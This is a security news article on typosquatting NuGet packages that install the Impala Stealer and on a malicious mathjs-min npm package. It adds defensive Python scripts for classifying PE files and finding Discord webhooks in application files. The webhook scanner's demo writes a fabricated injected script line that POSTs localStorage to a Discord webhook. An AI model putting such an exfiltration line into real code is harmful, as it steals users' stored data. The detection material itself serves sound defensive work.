Cybersecurity researchers have shared details of the cryptocurrency stealer malware distributed through 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers. The typosquatting campaign, discovered by JFrog at the end of last month, impersonated legitimate packages to execute PowerShell code that retrieved a follow-up binary from a hard-coded server. The two-stage attack ends with the deployment of a .NET-based persistent backdoor, known as Impala Stealer, that can gain unauthorized access to users' cryptocurrency accounts. In a statement to The Hacker News, JFrog stated, “The payload used a very rare obfuscation technique, called ‘.NET AoT compilation,’ which is a lot more stealthy than using ‘off the shelf’ obfuscators while still making the binary hard to reverse engineer.”
.NET Ahead-of-Time (AOT) compilation pre-compiles an application to native machine code, which gives faster startup and lower memory usage and lets the resulting executable run on a machine without the .NET runtime installed. For a defender the same property cuts the other way: a Native AOT binary ships no IL, so the decompilers and metadata-based triage normally used on .NET malware have nothing to work with, and the file looks like any other native executable. The second-stage payload also includes an auto-update mechanism that fetches new versions of the executable from a remote location. It achieves persistence by injecting JavaScript code into the Discord or Microsoft Visual Studio Code applications, so that launching either of them starts the stealer binary.
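The practical consequence of the AOT point above is that tooling which assumes "a .NET sample has a CLR header" will misclassify the payload. The following is an added example, not code from the article or from JFrog: it checks whether a PE file carries a CLR runtime header (data directory slot 14, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR), which a managed assembly has and a Native AOT image does not. The `build_header` helper fabricates minimal PE headers so the check can be exercised offline; the RVA and size values it writes are constructed, not taken from any real binary.

```python
"""Added example (not from the article or JFrog): distinguish a managed
.NET assembly from a native PE such as a Native AOT image by checking
for the CLR runtime header in the PE optional header's data directories."""
import struct

CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def has_clr_header(pe: bytes) -> bool:
    """Return True when the optional header points at a CLR runtime header.

    Managed assemblies (IL, and also ReadyToRun images) have one; a Native
    AOT executable, like any other native PE, does not.
    """
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:      # PE32: NumberOfRvaAndSizes at +92, directories at +96
        count_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:    # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        count_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    n_dirs = struct.unpack_from("<I", pe, count_off)[0]
    entry = dirs_off + CLR_DIRECTORY_INDEX * 8
    # The CLR slot must exist and lie inside the declared optional header.
    if n_dirs <= CLR_DIRECTORY_INDEX or entry + 8 > opt + size_of_optional:
        return False
    rva, size = struct.unpack_from("<II", pe, entry)
    return rva != 0 and size != 0


def classify(pe: bytes) -> str:
    """Human-readable verdict for a triage report."""
    if has_clr_header(pe):
        return "managed .NET assembly"
    return "native PE (no CLR header; Native AOT is one possibility)"


def build_header(pe32plus: bool, managed: bool) -> bytes:
    """Constructed minimal PE header for testing: DOS header, PE signature,
    COFF header and an optional header with 16 data directories, no sections."""
    fixed = 112 if pe32plus else 96
    n_dirs = 16
    opt = bytearray(fixed + 8 * n_dirs)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)   # Magic
    struct.pack_into("<I", opt, fixed - 4, n_dirs)                  # NumberOfRvaAndSizes
    if managed:
        # Constructed RVA/size for the CLR header; real values depend on layout.
        struct.pack_into("<II", opt, fixed + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)
    coff = bytearray(20)
    struct.pack_into("<H", coff, 16, len(opt))                      # SizeOfOptionalHeader
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    return bytes(dos) + b"PE\0\0" + bytes(coff) + bytes(opt)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, "->", classify(f.read()))
```

Two caveats when using this in a pipeline: a missing CLR header only says the file is native, not that it was produced by Native AOT (a C++ dropper gives the same answer), and ReadyToRun images keep their CLR header and IL, so they still classify as managed. Treat "native" as a prompt to route the sample to native-code tooling rather than as an AOT signature.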
The binary then searches for an installation of the Exodus Wallet desktop application and injects JavaScript code into several of its HTML files to harvest sensitive data and exfiltrate it to a hard-coded Discord webhook. The JavaScript snippet, since removed from an online paste site, is believed to have been used to steal user credentials and other information of interest. Shachar Menashe, Senior Director at JFrog Security Research, stated that “bad actors used typosquatting techniques to deploy a custom malicious payload […] which targets the Exodus crypto wallet and leaks the victim’s credentials to cryptocurrency exchanges, by using code injection.”
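Because the exfiltration channel is a hard-coded Discord webhook embedded in injected script, the tampering leaves a greppable artifact in files that should never contain one. The following is an added example, not code from the article or from JFrog, that walks an application's resource directory and reports every Discord webhook URL found in JavaScript or HTML files. The sample directory layout (`src/app/index.html` and so on) and the webhook URL inside it are constructed for the demonstration and are not Exodus's real file names or the campaign's real webhook.

```python
"""Added example (not from the article or JFrog): scan an app's resource
tree for JavaScript/HTML that references a Discord webhook, the kind of
injected exfiltration code described in the text."""
import os
import re
import tempfile

# Discord webhook URLs have a fixed shape: /api/webhooks/<numeric id>/<token>
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)"
)
SCAN_EXTENSIONS = {".js", ".html", ".htm"}


def scan_for_webhooks(root: str) -> list[dict]:
    """Walk `root` and report each webhook URL found in JS/HTML files.

    Only a prefix of the token is returned so findings can be shared
    without handing out a working exfiltration endpoint."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    for m in WEBHOOK_RE.finditer(line):
                        findings.append({
                            "file": os.path.relpath(path, root),
                            "line": lineno,
                            "webhook_id": m.group(1),
                            "token_prefix": m.group(2)[:4] + "...",
                        })
    return findings


def make_sample_tree() -> str:
    """Constructed stand-in for an Electron app's resource directory.
    The layout is hypothetical and the webhook URL is fabricated."""
    root = tempfile.mkdtemp(prefix="app-resources-")
    app_dir = os.path.join(root, "src", "app")
    os.makedirs(app_dir)
    clean = '<html><body><script src="app.js"></script></body></html>\n'
    injected = clean + (
        "<script>fetch('https://discord.com/api/webhooks/"
        "000000000000000000/ConstructedExampleToken_not-real', "
        "{method:'POST',body:JSON.stringify(localStorage)})</script>\n"
    )
    with open(os.path.join(app_dir, "index.html"), "w", encoding="utf-8") as f:
        f.write(injected)          # the tampered file
    with open(os.path.join(app_dir, "settings.html"), "w", encoding="utf-8") as f:
        f.write(clean)             # untouched file, should not be reported
    with open(os.path.join(app_dir, "app.js"), "w", encoding="utf-8") as f:
        f.write("console.log('clean');\n")
    return root


def demo_findings() -> list[dict]:
    """Run the scanner over the constructed tree."""
    return scan_for_webhooks(make_sample_tree())


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()
    for hit in scan_for_webhooks(target):
        print(hit)
```

Point the script at the resources directory of the installed wallet, Discord or VS Code build you are checking (for packed Electron apps, extract the `.asar` archive first). A webhook URL in shipped application code is a strong enough signal on its own; comparing the flagged files against a clean copy of the same version then shows exactly what was injected.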
Our investigation has revealed that no open source software repository is entirely reliable, so precautionary measures are needed throughout the software development lifecycle to secure the software supply chain. This conclusion follows the discovery of a malicious npm package named mathjs-min, uploaded to the repository on March 26, 2023, that contained a credential stealer able to extract Discord passwords from the official app and from web browsers such as Google Chrome, Brave, and Opera. The package is a modified version of the popular JavaScript math library mathjs: the malicious code was injected after the library was forked, and the result was published to npm to deceive users into believing it was a minified version of the genuine mathjs library.